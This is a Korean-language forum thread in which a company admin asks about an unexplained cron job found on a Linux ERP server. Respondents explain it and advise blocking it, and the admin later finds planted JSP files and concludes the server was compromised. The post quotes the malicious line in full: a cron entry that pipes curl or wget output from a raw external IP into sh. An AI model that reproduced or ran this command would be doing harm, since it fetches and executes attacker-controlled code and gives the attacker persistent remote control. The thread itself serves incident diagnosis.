안녕하세요,
회사에서 관리하는 서버 중에 Linux ERP 서버에
아래와 같은 cron job이 추가되었습니다.
관리업체에서도 관련 내역을 추가한 적이 없다고 하는데
도대체 무슨 작업을 진행하는 건지 확인이 되지 않네요.
현재 comment 처리를 해 놓았는데 보안에 문제가 있는 부분인지 걱정이 됩니다.
어떤 cron 작업일까요?
#30 * * * * ( curl --user-agent curl_cron http://194.40.243.98 || wget --user-agent wget_cron -q - O - http://194.40.243.98 ) | sh
해당 질문의 문제를 해결, 도움이 되는 선택된 답변이 있습니다.
작성된 다른 답변도 확인해 보시기 바랍니다..
4개의 답변이 있습니다.
IP 조회해보니까 좀 수상해보이네요.
다른 서버들도 체크해보셔야 할 듯 합니다.
yab2 | 약 3년 전
혹시나 보안업체에서 서버 모니터링 인지 알고 있었는데 전혀 진행하지 않았다고 하네요. 일단 서버에서 crontab 설정 변경일에 변경된 파일을 모두 검색하였는데 별도의 agent 실행 파일과 jsp 소스를 찾았습니다. 다른 서버도 점검해야 하겠네요. 답변 감사드립니다.
매일 30분마다 ERP 관련 ? 다운로드하는것 같은데요?
ERP쪽 담당자와 연락함 해보세요
yab2 | 약 3년 전
답변 감사합니다. 참고하도록 하겠습니다.
일단 Crontab에대해서 설정하는 방법을 알면 어떤 행위가 이루어지는지 알수 있습니다.
아래 사이트 참고 하시면 쉬울거에요
https://happist.com/553442/%EC%84%9C%EB%B2%84%EC%97%90%EC%84%9C-%EC%9E%90%EB%8F%99-%EC%8B%A4%ED%96%89%EC%9D%84-%EA%B0%80%EB%8A%A5%EC%BC%80-%ED%95%B4%EC%A3%BC%EB%8A%94-crontab%ED%81%AC%EB%A1%A0%ED%83%AD-%EC%84%A4%EC%A0%95
yab2 | 약 3년 전
정보 감사드립니다.
매 30분 마다 194.40.243.98 웹 서버에 접속해서 정보를 넘겨주고, 194.40.243.98 서버로 부터 정보 ( 명령 )를 받아서 sh ( 쉘 )에다 명령을 실행 시키는 형태가 되는 것 같아 보이네요.
서버의 성능이나 상태 정보를 수집해서 모니터링하는 서버에 보내어서 그에 대한 처리를 하는 작업일 수도 있을 것 같아 보이긴 한데...
누구도 모르는 액션이라면 사용되지 않게 막아 두는게 맞을 것 같습니다.
작동되지 않게 막아 둔다면, 어느 시점이 되면 해당 리포트 정보가 수집 되지 않아서 연락이 오거나, 문제 제기를 하는 업체나 담당자가 나타나지 않을까요...?
문제를 제기하는 사람이 나타나지 않는다면, 악의적인 목적으로 사용된 코드일 가능성이 높을 것 같고요.
yab2 | 약 3년 전
감사합니다. 많은 도움이 되었습니다.
별도의 폴더를 생성하여 jsp 코드가 생성되는 부분을 찾았습니다. 해킹인 것 같네요.
참... 한숨이 나옵니다.